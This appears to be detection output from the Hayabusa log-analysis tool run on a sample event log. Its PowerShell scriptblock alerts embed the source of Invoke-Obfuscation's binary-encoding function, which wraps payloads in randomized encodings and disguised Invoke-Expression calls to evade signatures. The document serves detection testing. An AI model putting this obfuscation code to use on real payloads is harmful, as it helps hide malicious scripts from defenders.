$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. 
as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.266 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
